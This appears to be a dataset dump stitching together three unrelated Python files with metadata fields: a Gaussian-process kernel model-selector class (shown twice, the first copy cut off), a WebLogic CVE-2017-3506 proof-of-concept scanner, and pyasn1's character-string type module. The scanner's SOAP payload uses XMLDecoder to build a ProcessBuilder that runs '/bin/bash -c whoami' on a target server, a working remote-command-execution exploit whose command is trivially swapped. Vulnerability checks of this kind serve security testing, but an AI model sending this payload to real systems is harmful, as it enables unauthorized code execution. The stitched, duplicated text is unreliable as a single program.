grammar = BomsGrammar(hyperpriors=hyperpriors, base_kernel_names=base_kernel_names)
# Use Laplace inference by default.
if gp_args is not None and 'inference_method' not in gp_args:
gp_args['inference_method'] = 'laplace'
else:
gp_args = {'inference_method': 'laplace'}
super().__init__(grammar, fitness_fn, n_parents, additive_form, gp_fn, gp_args, optimizer, n_restarts_optimizer)
def _train(self,
eval_budget: int,
max_generations: int,
callbacks: CallbackList,
verbose: int = 1) -> GPModelPopulation:
pass
def _get_initial_candidate_covariances(self) -> List[Covariance]:
initial_level_depth = 2
max_number_of_initial_models = 500
initial_candidates = self.grammar.expand_full_brute_force(initial_level_depth, max_number_of_initial_models)
return initial_candidates
def _initialize(self,
eval_budget: int,
callbacks: CallbackList,
verbose: int = 0) -> GPModelPopulation:
population = GPModelPopulation()
# initialize models
initial_candidates = self._get_initial_candidates()
indices = [0]
initial_models = [initial_candidates[i] for i in indices]
self._evaluate_models(initial_models, eval_budget, callbacks=callbacks, verbose=verbose)
population.update(initial_candidates)
return population
@classmethod
def _build_from_input_dict(cls, input_dict: dict):
standardize_x = input_dict.pop('standardize_x')
standardize_y = input_dict.pop('standardize_y')
model_selector = super()._build_from_input_dict(input_dict)
model_selector.standardize_x = standardize_x
model_selector.standardize_y = standardize_y
return model_selector
def __str__(self):
return self.name
|
from typing import List, Callable, Optional, Union
from src.autoks.backend.model import RawGPModelType
from src.autoks.callbacks import CallbackList
from src.autoks.core.covariance import Covariance
from src.autoks.core.gp_model_population import GPModelPopulation
from src.autoks.core.grammar import BomsGrammar
from src.autoks.core.hyperprior import boms_hyperpriors
from src.autoks.core.model_selection.base import ModelSelector
class BomsModelSelector(ModelSelector):
def __init__(self,
grammar: Optional[BomsGrammar] = None,
base_kernel_names: Optional[List[str]] = None,
fitness_fn: Union[str, Callable[[RawGPModelType], float]] = 'loglikn',
n_parents: int = 1,
additive_form: bool = False,
gp_fn: Union[str, Callable] = 'gp_regression',
gp_args: Optional[dict] = None,
optimizer: Optional[str] = None,
n_restarts_optimizer: int = 3):
if grammar is None:
hyperpriors = boms_hyperpriors()
grammar = BomsGrammar(hyperpriors=hyperpriors, base_kernel_names=base_kernel_names)
# Use Laplace inference by default.
if gp_args is not None and 'inference_method' not in gp_args:
gp_args['inference_method'] = 'laplace'
else:
gp_args = {'inference_method': 'laplace'}
super().__init__(grammar, fitness_fn, n_parents, additive_form, gp_fn, gp_args, optimizer, n_restarts_optimizer)
def _train(self,
eval_budget: int,
max_generations: int,
callbacks: CallbackList,
verbose: int = 1) -> GPModelPopulation:
pass
def _get_initial_candidate_covariances(self) -> List[Covariance]:
initial_level_depth = 2
max_number_of_initial_models = 500
initial_candidates = self.grammar.expand_full_brute_force(initial_level_depth, max_number_of_initial_models)
return initial_candidates
def _initialize(self,
eval_budget: int,
callbacks: CallbackList,
verbose: int = 0) -> GPModelPopulation:
population = GPModelPopulation()
# initialize models
initial_candidates = self._get_initial_candidates()
indices = [0]
initial_models = [initial_candidates[i] for i in indices]
self._evaluate_models(initial_models, eval_budget, callbacks=callbacks, verbose=verbose)
population.update(initial_candidates)
return population
@classmethod
def _build_from_input_dict(cls, input_dict: dict):
standardize_x = input_dict.pop('standardize_x')
standardize_y = input_dict.pop('standardize_y')
model_selector = super()._build_from_input_dict(input_dict)
model_selector.standardize_x = standardize_x
model_selector.standardize_y = standardize_y
return model_selector
def __str__(self):
return self.name
|
en
| 0.590313
|
# Use Laplace inference by default. # initialize models
| 2.156649
| 2
|
WeblogicScanLot/poc/CVE_2017_3506.py
|
y11en/super-guacamole
| 32
|
6628056
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
'''
import sys
import requests
import re
import logging
logging.basicConfig(filename='Weblogic.log',
format='%(asctime)s %(message)s',
filemode="w", level=logging.INFO)
VUL=['CVE-2017-3506']
headers = {'user-agent': 'ceshi/0.0.1'}
def poc(url,index):
rurl=url
if not url.startswith("http"):
url = "http://" + url
if "/" in url:
url += '/wls-wsat/CoordinatorPortType'
post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>whoami</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
try:
response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers)
response = response.text
response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
except Exception:
response = ""
if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
logging.info('[+]{} has a JAVA deserialization vulnerability:{}.'.format(rurl,VUL[index]))
else:
logging.info('[-]{} not detected {}.'.format(rurl,VUL[index]))
def run(rip,rport,index):
url=rip+':'+str(rport)
poc(url=url,index=index)
if __name__ == '__main__':
dip = sys.argv[1]
dport = int(sys.argv[2])
run(dip,dport,0)
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
'''
import sys
import requests
import re
import logging
logging.basicConfig(filename='Weblogic.log',
format='%(asctime)s %(message)s',
filemode="w", level=logging.INFO)
VUL=['CVE-2017-3506']
headers = {'user-agent': 'ceshi/0.0.1'}
def poc(url,index):
rurl=url
if not url.startswith("http"):
url = "http://" + url
if "/" in url:
url += '/wls-wsat/CoordinatorPortType'
post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>whoami</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
try:
response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers)
response = response.text
response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
except Exception:
response = ""
if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
logging.info('[+]{} has a JAVA deserialization vulnerability:{}.'.format(rurl,VUL[index]))
else:
logging.info('[-]{} not detected {}.'.format(rurl,VUL[index]))
def run(rip,rport,index):
url=rip+':'+str(rport)
poc(url=url,index=index)
if __name__ == '__main__':
dip = sys.argv[1]
dport = int(sys.argv[2])
run(dip,dport,0)
|
en
| 0.288145
|
#!/usr/bin/env python3 # _*_ coding:utf-8 _*_ ____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>whoami</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
| 2.158667
| 2
|
pyasn1/type/char.py
|
EnjoyLifeFund/py36pkgs
| 39
|
6628057
|
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, <NAME> <<EMAIL>>
# License: http://pyasn1.sf.net/license.html
#
import sys
from pyasn1.type import univ, tag
from pyasn1 import error
__all__ = ['NumericString', 'PrintableString', 'TeletexString', 'T61String', 'VideotexString',
'IA5String', 'GraphicString', 'VisibleString', 'ISO646String',
'GeneralString', 'UniversalString', 'BMPString', 'UTF8String']
NoValue = univ.NoValue
noValue = univ.noValue
class AbstractCharacterString(univ.OctetString):
"""Creates |ASN.1| type or object.
|ASN.1| objects are immutable and duck-type Python 2 :class:`unicode` or Python 3 :class:`str`.
When used in octet-stream context, |ASN.1| type assumes "|encoding|" encoding.
Parameters
----------
value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
unicode object (Python 2) or string (Python 3), alternatively string
(Python 2) or bytes (Python 3) representing octet-stream of serialized
unicode string (note `encoding` parameter) or |ASN.1| class instance.
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing non-default ASN.1 tag(s)
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
encoding: :py:class:`str`
Unicode codec ID to encode/decode :class:`unicode` (Python 2) or
:class:`str` (Python 3) the payload when |ASN.1| object is used
in octet-stream context.
Raises
------
: :py:class:`pyasn1.error.PyAsn1Error`
On constraint violation or bad initializer.
"""
if sys.version_info[0] <= 2:
def __str__(self):
try:
return self._value.encode(self.encoding)
except UnicodeEncodeError:
raise error.PyAsn1Error(
'Can\'t encode string \'%s\' with \'%s\' codec' % (self._value, self.encoding)
)
def __unicode__(self):
return unicode(self._value)
def prettyIn(self, value):
if isinstance(value, unicode):
return value
elif isinstance(value, str):
try:
return value.decode(self.encoding)
except (LookupError, UnicodeDecodeError):
raise error.PyAsn1Error(
'Can\'t decode string \'%s\' with \'%s\' codec' % (value, self.encoding)
)
elif isinstance(value, (tuple, list)):
try:
return self.prettyIn(''.join([chr(x) for x in value]))
except ValueError:
raise error.PyAsn1Error(
'Bad %s initializer \'%s\'' % (self.__class__.__name__, value)
)
else:
try:
return unicode(value)
except UnicodeDecodeError:
raise error.PyAsn1Error(
'Can\'t turn object \'%s\' into unicode' % (value,)
)
def asOctets(self, padding=True):
return str(self)
def asNumbers(self, padding=True):
return tuple([ord(x) for x in str(self)])
else:
def __str__(self):
return str(self._value)
def __bytes__(self):
try:
return self._value.encode(self.encoding)
except UnicodeEncodeError:
raise error.PyAsn1Error(
'Can\'t encode string \'%s\' with \'%s\' codec' % (self._value, self.encoding)
)
def prettyIn(self, value):
if isinstance(value, str):
return value
elif isinstance(value, bytes):
try:
return value.decode(self.encoding)
except UnicodeDecodeError:
raise error.PyAsn1Error(
'Can\'t decode string \'%s\' with \'%s\' codec' % (value, self.encoding)
)
elif isinstance(value, (tuple, list)):
return self.prettyIn(bytes(value))
else:
try:
return str(value)
except (UnicodeDecodeError, ValueError):
raise error.PyAsn1Error(
'Can\'t turn object \'%s\' into unicode' % (value,)
)
def asOctets(self, padding=True):
return bytes(self)
def asNumbers(self, padding=True):
return tuple(bytes(self))
def prettyOut(self, value):
return value
def __reversed__(self):
return reversed(self._value)
def clone(self, value=noValue, **kwargs):
"""Creates a copy of a |ASN.1| type or object.
Any parameters to the *clone()* method will replace corresponding
properties of the |ASN.1| object.
Parameters
----------
value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
unicode object (Python 2) or string (Python 3), alternatively string
(Python 2) or bytes (Python 3) representing octet-stream of serialized
unicode string (note `encoding` parameter) or |ASN.1| class instance.
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing non-default ASN.1 tag(s)
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
encoding: :py:class:`str`
Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or
:py:class:`str` (Python 3) the payload when |ASN.1| object is used
in octet-stream context.
Returns
-------
:
new instance of |ASN.1| type/value
"""
return univ.OctetString.clone(self, value, **kwargs)
def subtype(self, value=noValue, **kwargs):
"""Creates a copy of a |ASN.1| type or object.
Any parameters to the *subtype()* method will be added to the corresponding
properties of the |ASN.1| object.
Parameters
----------
value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
unicode object (Python 2) or string (Python 3), alternatively string
(Python 2) or bytes (Python 3) representing octet-stream of serialized
unicode string (note `encoding` parameter) or |ASN.1| class instance.
implicitTag: :py:class:`~pyasn1.type.tag.Tag`
Implicitly apply given ASN.1 tag object to caller's
:py:class:`~pyasn1.type.tag.TagSet`, then use the result as
new object's ASN.1 tag(s).
explicitTag: :py:class:`~pyasn1.type.tag.Tag`
Explicitly apply given ASN.1 tag object to caller's
:py:class:`~pyasn1.type.tag.TagSet`, then use the result as
new object's ASN.1 tag(s).
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
encoding: :py:class:`str`
Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or
:py:class:`str` (Python 3) the payload when |ASN.1| object is used
in octet-stream context.
Returns
-------
:
new instance of |ASN.1| type/value
"""
return univ.OctetString.subtype(self, value, **kwargs)
class NumericString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 18)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class PrintableString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 19)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class TeletexString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 20)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class T61String(TeletexString):
__doc__ = TeletexString.__doc__
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class VideotexString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 21)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class IA5String(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 22)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class GraphicString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 25)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class VisibleString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 26)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class ISO646String(VisibleString):
__doc__ = VisibleString.__doc__
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class GeneralString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 27)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class UniversalString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 28)
)
encoding = "utf-32-be"
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class BMPString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 30)
)
encoding = "utf-16-be"
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class UTF8String(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 12)
)
encoding = "utf-8"
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
|
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, <NAME> <<EMAIL>>
# License: http://pyasn1.sf.net/license.html
#
import sys
from pyasn1.type import univ, tag
from pyasn1 import error
__all__ = ['NumericString', 'PrintableString', 'TeletexString', 'T61String', 'VideotexString',
'IA5String', 'GraphicString', 'VisibleString', 'ISO646String',
'GeneralString', 'UniversalString', 'BMPString', 'UTF8String']
NoValue = univ.NoValue
noValue = univ.noValue
class AbstractCharacterString(univ.OctetString):
"""Creates |ASN.1| type or object.
|ASN.1| objects are immutable and duck-type Python 2 :class:`unicode` or Python 3 :class:`str`.
When used in octet-stream context, |ASN.1| type assumes "|encoding|" encoding.
Parameters
----------
value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
unicode object (Python 2) or string (Python 3), alternatively string
(Python 2) or bytes (Python 3) representing octet-stream of serialized
unicode string (note `encoding` parameter) or |ASN.1| class instance.
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing non-default ASN.1 tag(s)
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
encoding: :py:class:`str`
Unicode codec ID to encode/decode :class:`unicode` (Python 2) or
:class:`str` (Python 3) the payload when |ASN.1| object is used
in octet-stream context.
Raises
------
: :py:class:`pyasn1.error.PyAsn1Error`
On constraint violation or bad initializer.
"""
if sys.version_info[0] <= 2:
def __str__(self):
try:
return self._value.encode(self.encoding)
except UnicodeEncodeError:
raise error.PyAsn1Error(
'Can\'t encode string \'%s\' with \'%s\' codec' % (self._value, self.encoding)
)
def __unicode__(self):
return unicode(self._value)
def prettyIn(self, value):
if isinstance(value, unicode):
return value
elif isinstance(value, str):
try:
return value.decode(self.encoding)
except (LookupError, UnicodeDecodeError):
raise error.PyAsn1Error(
'Can\'t decode string \'%s\' with \'%s\' codec' % (value, self.encoding)
)
elif isinstance(value, (tuple, list)):
try:
return self.prettyIn(''.join([chr(x) for x in value]))
except ValueError:
raise error.PyAsn1Error(
'Bad %s initializer \'%s\'' % (self.__class__.__name__, value)
)
else:
try:
return unicode(value)
except UnicodeDecodeError:
raise error.PyAsn1Error(
'Can\'t turn object \'%s\' into unicode' % (value,)
)
def asOctets(self, padding=True):
return str(self)
def asNumbers(self, padding=True):
return tuple([ord(x) for x in str(self)])
else:
def __str__(self):
return str(self._value)
def __bytes__(self):
try:
return self._value.encode(self.encoding)
except UnicodeEncodeError:
raise error.PyAsn1Error(
'Can\'t encode string \'%s\' with \'%s\' codec' % (self._value, self.encoding)
)
def prettyIn(self, value):
if isinstance(value, str):
return value
elif isinstance(value, bytes):
try:
return value.decode(self.encoding)
except UnicodeDecodeError:
raise error.PyAsn1Error(
'Can\'t decode string \'%s\' with \'%s\' codec' % (value, self.encoding)
)
elif isinstance(value, (tuple, list)):
return self.prettyIn(bytes(value))
else:
try:
return str(value)
except (UnicodeDecodeError, ValueError):
raise error.PyAsn1Error(
'Can\'t turn object \'%s\' into unicode' % (value,)
)
def asOctets(self, padding=True):
return bytes(self)
def asNumbers(self, padding=True):
return tuple(bytes(self))
def prettyOut(self, value):
return value
def __reversed__(self):
return reversed(self._value)
def clone(self, value=noValue, **kwargs):
"""Creates a copy of a |ASN.1| type or object.
Any parameters to the *clone()* method will replace corresponding
properties of the |ASN.1| object.
Parameters
----------
value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
unicode object (Python 2) or string (Python 3), alternatively string
(Python 2) or bytes (Python 3) representing octet-stream of serialized
unicode string (note `encoding` parameter) or |ASN.1| class instance.
tagSet: :py:class:`~pyasn1.type.tag.TagSet`
Object representing non-default ASN.1 tag(s)
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
encoding: :py:class:`str`
Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or
:py:class:`str` (Python 3) the payload when |ASN.1| object is used
in octet-stream context.
Returns
-------
:
new instance of |ASN.1| type/value
"""
return univ.OctetString.clone(self, value, **kwargs)
def subtype(self, value=noValue, **kwargs):
"""Creates a copy of a |ASN.1| type or object.
Any parameters to the *subtype()* method will be added to the corresponding
properties of the |ASN.1| object.
Parameters
----------
value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
unicode object (Python 2) or string (Python 3), alternatively string
(Python 2) or bytes (Python 3) representing octet-stream of serialized
unicode string (note `encoding` parameter) or |ASN.1| class instance.
implicitTag: :py:class:`~pyasn1.type.tag.Tag`
Implicitly apply given ASN.1 tag object to caller's
:py:class:`~pyasn1.type.tag.TagSet`, then use the result as
new object's ASN.1 tag(s).
explicitTag: :py:class:`~pyasn1.type.tag.Tag`
Explicitly apply given ASN.1 tag object to caller's
:py:class:`~pyasn1.type.tag.TagSet`, then use the result as
new object's ASN.1 tag(s).
subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
Object representing non-default ASN.1 subtype constraint(s)
encoding: :py:class:`str`
Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or
:py:class:`str` (Python 3) the payload when |ASN.1| object is used
in octet-stream context.
Returns
-------
:
new instance of |ASN.1| type/value
"""
return univ.OctetString.subtype(self, value, **kwargs)
class NumericString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 18)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class PrintableString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 19)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class TeletexString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 20)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class T61String(TeletexString):
__doc__ = TeletexString.__doc__
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class VideotexString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 21)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class IA5String(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 22)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class GraphicString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 25)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class VisibleString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 26)
)
encoding = 'us-ascii'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class ISO646String(VisibleString):
__doc__ = VisibleString.__doc__
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class GeneralString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 27)
)
encoding = 'iso-8859-1'
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class UniversalString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 28)
)
encoding = "utf-32-be"
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class BMPString(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 30)
)
encoding = "utf-16-be"
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
class UTF8String(AbstractCharacterString):
__doc__ = AbstractCharacterString.__doc__
#: Set (on class, not on instance) or return a
#: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
#: associated with |ASN.1| type.
tagSet = AbstractCharacterString.tagSet.tagImplicitly(
tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 12)
)
encoding = "utf-8"
# Optimization for faster codec lookup
typeId = AbstractCharacterString.getTypeId()
|
en
| 0.503038
|
